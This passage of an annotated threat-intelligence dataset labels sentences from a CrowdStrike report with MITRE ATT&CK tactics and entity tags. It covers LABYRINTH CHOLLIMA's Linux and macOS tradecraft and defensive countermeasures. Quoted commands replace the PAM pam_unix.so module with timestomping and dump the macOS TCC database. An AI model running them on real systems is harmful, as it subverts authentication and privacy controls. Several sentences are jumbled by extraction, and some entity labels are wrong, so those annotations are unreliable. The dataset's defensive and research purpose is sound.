"relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s453-22892c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 453, "context_before": "-o /dev/shm/[REDACTED FileName] -a", "sentence_text": "NOWHERE TO HIDE 38 Cross-Platform Proficiency Takes Center Stage Today’s organizations rely on multiple operating systems working in concert for IT environments to run efficiently.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s454-d722ab", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 454, "context_before": "NOWHERE TO HIDE 38 Cross-Platform Proficiency Takes Center Stage Today’s organizations rely on multiple operating systems working in concert for IT environments to run efficiently.", "sentence_text": "Falcon OverWatch threat hunters are skilled at hunting across all major platforms — Windows, Linux and macOS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s455-5a02c4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 455, "context_before": "Falcon OverWatch threat hunters are skilled at hunting across all major platforms — Windows, Linux and macOS.", "sentence_text": "This year, Falcon OverWatch saw adversaries showcase their prowess across all of these systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s456-0d9b0a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 456, "context_before": "This year, Falcon OverWatch saw adversaries showcase their prowess across all of these systems.", "sentence_text": "LABYRINTH CHOLLIMA led the charge, highlighting their ability to operate across Windows and macOS in their targeting of the 3CX supply chain.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.002", "name": "Compromise Software Supply Chain" } ], "procedure": "LABYRINTH CHOLLIMA operates on multiple OS's and target 3CX supply chains", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 0, "end": 18, "label": "ThreatActor" }, { "text": "operate ", "start": 65, "end": 73, "label": "Action" }, { "text": " targeting of the 3CX supply chain", "start": 106, "end": 140, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s457-00d0b6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 457, "context_before": "LABYRINTH CHOLLIMA led the charge, highlighting their ability to operate across Windows and macOS in their targeting of the 3CX supply chain.", "sentence_text": "Notorious for targeting financial technology and cryptocurrency organizations, LABYRINTH CHOLLIMA was observed updating both their custom tooling and their tradecraft to work specifically on Linux and macOS.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "LABYRINTH CHOLLIMA updates their tools and tradecraft", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 79, "end": 97, "label": "ThreatActor" }, { "text": "updating ", "start": 111, "end": 120, "label": "Action" }, { "text": "custom tooling and their tradecraft", "start": 131, "end": 166, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s458-bafded", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 458, "context_before": "Notorious for targeting financial technology and cryptocurrency organizations, LABYRINTH CHOLLIMA was observed updating both their custom tooling and their tradecraft to work specifically on Linux and macOS.", "sentence_text": "Key Facts and Figures at a Glance:\n¼ 3x increase in adversaries Threat Actor Spotlight: LABYRINTH CHOLLIMA replacing Pluggable Authentication Modules LABYRINTH CHOLLIMA is one of the most prolific Democratic People’s Republic (PAM) with malicious of Korea (DPRK) adversaries tracked by CrowdStrike and has been active since at modules in Linux, typically for least 2009.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s459-2501da", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 459, "context_before": "Key Facts and Figures at a Glance:\n¼ 3x increase in adversaries Threat Actor Spotlight: LABYRINTH CHOLLIMA replacing Pluggable Authentication Modules LABYRINTH CHOLLIMA is one of the most prolific Democratic People’s Republic (PAM) with malicious of Korea (DPRK) adversaries tracked by CrowdStrike and has been active since at modules in Linux, typically for least 2009.", "sentence_text": "LABYRINTH CHOLLIMA’s campaigns broadly trend services are the top targeted toward a greater emphasis on operational security and defense evasion tactics, macOS verticals with the adversary increasing efforts to evade traditional detection methods and hinder third-party analysis and tracking of its campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "LABYRINTH CHOLLIMA increases efforts to evade traditional detection methods and hinder third-party analysis and tracking of its campaigns.", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 0, "end": 18, "label": "ThreatActor" }, { "text": "evade traditional detection methods", "start": 211, "end": 246, "label": "Action" }, { "text": "hinder third-party analysis and tracking of its campaigns", "start": 251, "end": 308, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p38-s460-3a4646", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 38, "sentence_id": 460, "context_before": "LABYRINTH CHOLLIMA’s campaigns broadly trend services are the top targeted toward a greater emphasis on operational security and defense evasion tactics, macOS verticals with the adversary increasing efforts to evade traditional detection methods and hinder third-party analysis and tracking of its campaigns.", "sentence_text": "¼ LABYRINTH CHOLLIMA has proven they are adept at operating in all major operating systems ¼ After a first intrusion attempt, LABYRINTH CHOLLIMA will often attempt to gain access to a victim organization again within the same year", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p39-s461-8b41fe", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 39, "sentence_id": 461, "context_before": "¼ LABYRINTH CHOLLIMA has proven they are adept at operating in all major operating systems ¼ After a first intrusion attempt, LABYRINTH CHOLLIMA will often attempt to gain access to a victim organization again within the same year", "sentence_text": "NOWHERE TO HIDE 39 LINUX INSIGHTS AND TRENDS Falcon OverWatch continues to observe adversaries operating comfortably within Linux environments to progress their mission objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p39-s462-814c47", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 39, "sentence_id": 462, "context_before": "NOWHERE TO HIDE 39 LINUX INSIGHTS AND TRENDS Falcon OverWatch continues to observe adversaries operating comfortably within Linux environments to progress their mission objectives.", "sentence_text": "As shown in technology and telecommunications verticals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p39-s463-ee44ef", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 39, "sentence_id": 463, "context_before": "As shown in technology and telecommunications verticals.", "sentence_text": "The Role of Linux Hosts in an ACADEMIC FINANCIAL RETAIL MEDIA SERVICES OTHER INSURANCE ESTATE ENERGY REAL Organization TECHNOLOGY HEALTHCARE MANUFACTURING PHARMACEUTICAL GOVERNMENT Because Linux hosts primarily TELECOMMUNICATIONS AEROSPACE/DEFENSE function as infrastructure as opposed to end-user machines, typical social June 2023 user interaction — such as phishing attachments or end-user execution Common Linux Tooling Provides Substantial Functionality to — are not viable initial access Adversaries techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p39-s464-08f060", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 39, "sentence_id": 464, "context_before": "The Role of Linux Hosts in an ACADEMIC FINANCIAL RETAIL MEDIA SERVICES OTHER INSURANCE ESTATE ENERGY REAL Organization TECHNOLOGY HEALTHCARE MANUFACTURING PHARMACEUTICAL GOVERNMENT Because Linux hosts primarily TELECOMMUNICATIONS AEROSPACE/DEFENSE function as infrastructure as opposed to end-user machines, typical social June 2023 user interaction — such as phishing attachments or end-user execution Common Linux Tooling Provides Substantial Functionality to — are not viable initial access Adversaries techniques.", "sentence_text": "For example, an adversary can leverage nmap exposed remote services, or abuse for network discovery; 33 cat to read various credentials, history,34 configuration, valid credentials to gain access to a and database files; ps, grep or find to perform discovery on running target device.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" }, { "id": "T1552.001", "name": "Credentials In Files" }, { "id": "T1595", "name": "Active Scanning" } ], "procedure": "adversaries can leverage nmap, abuse network discovery, read various credentials, gain access and perform discoveries", "entities": [ { "text": "adversary ", "start": 16, "end": 26, "label": "MalwareTool" }, { "text": "leverage ", "start": 30, "end": 39, "label": "Action" }, { "text": "abuse ", "start": 72, "end": 78, "label": "Action" }, { "text": "network discovery", "start": 82, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "exposed remote services", "start": 44, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "valid credentials", "start": 163, "end": 180, "label": "Action" }, { "text": "to gain access", "start": 181, "end": 195, "label": "Action" }, { "text": "cat ", "start": 104, "end": 108, "label": "MalwareTool" }, { "text": "read", "start": 111, "end": 115, "label": "Action" }, { "text": "perform discovery", "start": 241, "end": 258, "label": "Action" }, { "text": " running target device", "start": 261, "end": 283, "label": "Infrastructure_Indicator" }, { "text": "database files", "start": 205, "end": 219, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p39-s465-7f139b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 39, "sentence_id": 465, "context_before": "For example, an adversary can leverage nmap exposed remote services, or abuse for network discovery; 33 cat to read various credentials, history,34 configuration, valid credentials to gain access to a and database files; ps, grep or find to perform discovery on running target device.", "sentence_text": "Where the required tools are not immediately available, they are often easily accessible by leveraging native binaries to pull down scripts or tools from repositories or adversary staging servers.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "tools are leveraged from repositaries", "entities": [ { "text": "leveraging", "start": 92, "end": 102, "label": "Action" }, { "text": "pull down scripts or tools from repositories", "start": 122, "end": 166, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p39-s466-5c2db1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 39, "sentence_id": 466, "context_before": "Where the required tools are not immediately available, they are often easily accessible by leveraging native binaries to pull down scripts or tools from repositories or adversary staging servers.", "sentence_text": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1046/.\n34 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1552/003/.\n35 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1016/001/.\n36", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p39-s467-6d7f7b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 39, "sentence_id": 467, "context_before": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1046/.\n34 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1552/003/.\n35 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1016/001/.\n36", "sentence_text": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1070/004/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p40-s468-70498c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 40, "sentence_id": 468, "context_before": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1070/004/.", "sentence_text": "NOWHERE TO HIDE 40 Bash is the default shell in most Linux installations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p40-s469-057a91", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 40, "sentence_id": 469, "context_before": "NOWHERE TO HIDE 40 Bash is the default shell in most Linux installations.", "sentence_text": "Though alternative shells like dash may lack some features like tab completion, Falcon OverWatch predicts that alternative shells will remain popular in the future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p40-s470-b08359", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 40, "sentence_id": 470, "context_before": "Though alternative shells like dash may lack some features like tab completion, Falcon OverWatch predicts that alternative shells will remain popular in the future.", "sentence_text": "The adversaries masquerade38 their malicious module as the PAM pam_unix.so or have their malicious version staged in another directory (e.g., /tmp/pam_unix.so) before overwriting the legitimate module.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" }, { "id": "T1556.003", "name": "Pluggable Authentication Modules" } ], "procedure": "adversaries masquerade their malicious module as PAM", "entities": [ { "text": "adversaries ", "start": 4, "end": 16, "label": "MalwareTool" }, { "text": "masquerade38 ", "start": 16, "end": 29, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p40-s471-615c1b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 40, "sentence_id": 471, "context_before": "The adversaries masquerade38 their malicious module as the PAM pam_unix.so or have their malicious version staged in another directory (e.g., /tmp/pam_unix.so) before overwriting the legitimate module.", "sentence_text": "chmod 755 pam_unix.so cp -i pam_unix.so pam_unix.so.1 cp -i /tmp/pam_unix.so pam_unix.so touch -r pam_xauth.so pam_unix.so touch -r pam_xauth.so pam_unix.so.1 In the above example, the touch commands were likely used to conduct timestomping39 to further evade detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p40-s472-caf894", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 40, "sentence_id": 472, "context_before": "chmod 755 pam_unix.so cp -i pam_unix.so pam_unix.so.1 cp -i /tmp/pam_unix.so pam_unix.so touch -r pam_xauth.so pam_unix.so touch -r pam_xauth.so pam_unix.so.1 In the above example, the touch commands were likely used to conduct timestomping39 to further evade detection.", "sentence_text": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/003/.\n38 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1036/005/.\n39 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1070/006/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p41-s473-12e621", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 41, "sentence_id": 473, "context_before": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/003/.\n38 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1036/005/.\n39 For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1070/006/.", "sentence_text": "NOWHERE TO HIDE 41 macOS INSIGHTS AND TRENDS Falcon OverWatch observed a marked increase in the number of interactive intrusions against macOS systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p41-s474-d5ea3e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 41, "sentence_id": 474, "context_before": "NOWHERE TO HIDE 41 macOS INSIGHTS AND TRENDS Falcon OverWatch observed a marked increase in the number of interactive intrusions against macOS systems.", "sentence_text": "This group focused a number of efforts against organizations running macOS devices and demonstrated a high level of proficiency in doing so.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p41-s475-7caf03", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 41, "sentence_id": 475, "context_before": "This group focused a number of efforts against organizations running macOS devices and demonstrated a high level of proficiency in doing so.", "sentence_text": "LABYRINTH CHOLLIMA is known to target the financial and technology verticals, in particular cryptocurrency organizations and other fintech businesses that sit at the intersection of these two verticals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p41-s476-71e5d5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 41, "sentence_id": 476, "context_before": "LABYRINTH CHOLLIMA is known to target the financial and technology verticals, in particular cryptocurrency organizations and other fintech businesses that sit at the intersection of these two verticals.", "sentence_text": "This preference plays out in the macOS intrusions by industry vertical data, shown in macOS INTRUSIONS BY VERTICAL FINANCIAL TECHNOLOGY SERVICES ACADEMIC MANUFACTURING OTHER TRANSPORTATION/LOGISTICS to June 2023", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s477-812019", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 477, "context_before": "This preference plays out in the macOS intrusions by industry vertical data, shown in macOS INTRUSIONS BY VERTICAL FINANCIAL TECHNOLOGY SERVICES ACADEMIC MANUFACTURING OTHER TRANSPORTATION/LOGISTICS to June 2023", "sentence_text": "NOWHERE TO HIDE 42 Observed macOS Tactics Falcon OverWatch identified LABYRINTH CHOLLIMA attempting to dump the Transparency, Consent and Control (TCC) database.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "LABYRINTH CHOLLIMA attempts to dump the TCC database to access sensitive information.", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 70, "end": 88, "label": "ThreatActor" }, { "text": "attempting to dump the Transparency, Consent and Control (TCC) database", "start": 89, "end": 160, "label": "Action" }, { "text": "Transparency, Consent and Control (TCC) database", "start": 112, "end": 160, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s478-e83dfc", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 478, "context_before": "NOWHERE TO HIDE 42 Observed macOS Tactics Falcon OverWatch identified LABYRINTH CHOLLIMA attempting to dump the Transparency, Consent and Control (TCC) database.", "sentence_text": "The TCC framework was implemented as a security and privacy control by Apple to prevent installed applications from being able to access sensitive data without explicit permission from the user, which arises as a user prompt.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s479-ec9f06", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 479, "context_before": "The TCC framework was implemented as a security and privacy control by Apple to prevent installed applications from being able to access sensitive data without explicit permission from the user, which arises as a user prompt.", "sentence_text": "User responses (allow or do not allow)\nare stored in this database.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s480-91bbfe", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 480, "context_before": "User responses (allow or do not allow)\nare stored in this database.", "sentence_text": "If an application tries to access files in a directory protected by TCC without authorization, the operation is denied.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s481-2ba433", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 481, "context_before": "If an application tries to access files in a directory protected by TCC without authorization, the operation is denied.", "sentence_text": "As denoted by the command line below, TCC stores these permissions in a SQLite3 database located both globally (/Library/Application Support/com.apple.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s482-957b6c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 482, "context_before": "As denoted by the command line below, TCC stores these permissions in a SQLite3 database located both globally (/Library/Application Support/com.apple.", "sentence_text": "TCC/TCC.\ndb)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s483-a78780", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 483, "context_before": "TCC/TCC.\ndb)", "sentence_text": "and at the user level ($HOME/Library/Application Support/com.apple.\nTCC/TCC.db).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s484-83863b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 484, "context_before": "and at the user level ($HOME/Library/Application Support/com.apple.\nTCC/TCC.db).", "sentence_text": "/bin/bash -c sqlite3 /Library/Application\\ Support/com.apple.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s485-0af948", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 485, "context_before": "/bin/bash -c sqlite3 /Library/Application\\ Support/com.apple.", "sentence_text": "TCC/ TCC.db '.dump access' If an adversary were to gain write access to the TCC.db, they could grant themselves TCC entitlements without alerting the user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s486-fef6ce", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 486, "context_before": "TCC/ TCC.db '.dump access' If an adversary were to gain write access to the TCC.db, they could grant themselves TCC entitlements without alerting the user.", "sentence_text": "Apple implemented System Integrity Protection (SIP) to mitigate this.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s487-a8573f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 487, "context_before": "Apple implemented System Integrity Protection (SIP) to mitigate this.", "sentence_text": "With the dumped database, an adversary would likely leverage the outputs to determine what applications are allowed to access which services and any code-signing requirement data (csreq).", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "adversary will leverage the outputs", "entities": [ { "text": "adversary ", "start": 29, "end": 39, "label": "MalwareTool" }, { "text": "leverage the outputs", "start": 52, "end": 72, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s488-e3ef06", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 488, "context_before": "With the dumped database, an adversary would likely leverage the outputs to determine what applications are allowed to access which services and any code-signing requirement data (csreq).", "sentence_text": "The output of this dump would present a gold mine of possible applications to exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p42-s489-d1781c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 42, "sentence_id": 489, "context_before": "The output of this dump would present a gold mine of possible applications to exploit.", "sentence_text": "However, the CrowdStrike Falcon agent prevents the dumping of the TCC database on macOS hosts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s490-859c1a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 490, "context_before": "However, the CrowdStrike Falcon agent prevents the dumping of the TCC database on macOS hosts.", "sentence_text": "NOWHERE TO HIDE 43 Defensive Countermeasures With the advances adversaries are making in targeting Linux and macOS environments, defenders must familiarize themselves with macOS and Linux TTPs and implement the appropriate defenses across their infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s491-d71a63", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 491, "context_before": "NOWHERE TO HIDE 43 Defensive Countermeasures With the advances adversaries are making in targeting Linux and macOS environments, defenders must familiarize themselves with macOS and Linux TTPs and implement the appropriate defenses across their infrastructure.", "sentence_text": "Implement file integrity control and monitoring around sensitive files and logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s492-3527ab", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 492, "context_before": "Implement file integrity control and monitoring around sensitive files and logs.", "sentence_text": "Alert for anomalous processes reading sensitive files that may contain credentials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s493-2aba33", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 493, "context_before": "Alert for anomalous processes reading sensitive files that may contain credentials.", "sentence_text": "Disable remote login (i.e., SSH).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s494-91662c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 494, "context_before": "Disable remote login (i.e., SSH).", "sentence_text": "If SSH must be enabled, augment with MFA and additional identity protection to further thwart adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s495-b5b9e9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 495, "context_before": "If SSH must be enabled, augment with MFA and additional identity protection to further thwart adversaries.", "sentence_text": "Monitor and/or prevent modification of PAM components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s496-f0cba7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 496, "context_before": "Monitor and/or prevent modification of PAM components.", "sentence_text": "This can be done through proper privilege separation (e.g., SELinux).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s497-776ec3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 497, "context_before": "This can be done through proper privilege separation (e.g., SELinux).", "sentence_text": "Enable default macOS system protections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s498-ed8717", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 498, "context_before": "Enable default macOS system protections.", "sentence_text": "Gatekeeper and SIP should be on by default for macOS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s499-1a4b77", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 499, "context_before": "Gatekeeper and SIP should be on by default for macOS.", "sentence_text": "Monitor for any disabling of Gatekeeper or SIP, and implement automated re-enabling of these protections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s500-3b350f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 500, "context_before": "Monitor for any disabling of Gatekeeper or SIP, and implement automated re-enabling of these protections.", "sentence_text": "Security practitioners can automate via spctl and csrutil to re-enable Gatekeeper and SIP, respectively.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s501-2cff28", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 501, "context_before": "Security practitioners can automate via spctl and csrutil to re-enable Gatekeeper and SIP, respectively.", "sentence_text": "Maintain user awareness.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s502-e02b2a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 502, "context_before": "Maintain user awareness.", "sentence_text": "Training users on the pitfalls of disabling many of macOS’s built-in security precautions can prove essential in mitigating social engineering tactics that require user execution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s503-da4379", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 503, "context_before": "Training users on the pitfalls of disabling many of macOS’s built-in security precautions can prove essential in mitigating social engineering tactics that require user execution.", "sentence_text": "Ensure coverage across the entire enterprise to reduce the attack surface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p43-s504-dd354b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 43, "sentence_id": 504, "context_before": "Ensure coverage across the entire enterprise to reduce the attack surface.", "sentence_text": "Adversaries often target vulnerable and unmanaged assets to gain initial access, then use lifted credentials to pivot to additional resources via trusted remote access software and protocols.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1021", "name": "Remote Services" }, { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "adversaries target vulnerable credentials to gain access and use them to pivot to resources remotely", "entities": [ { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "target", "start": 18, "end": 24, "label": "Action" }, { "text": "vulnerable and unmanaged assets", "start": 25, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "to gain initial 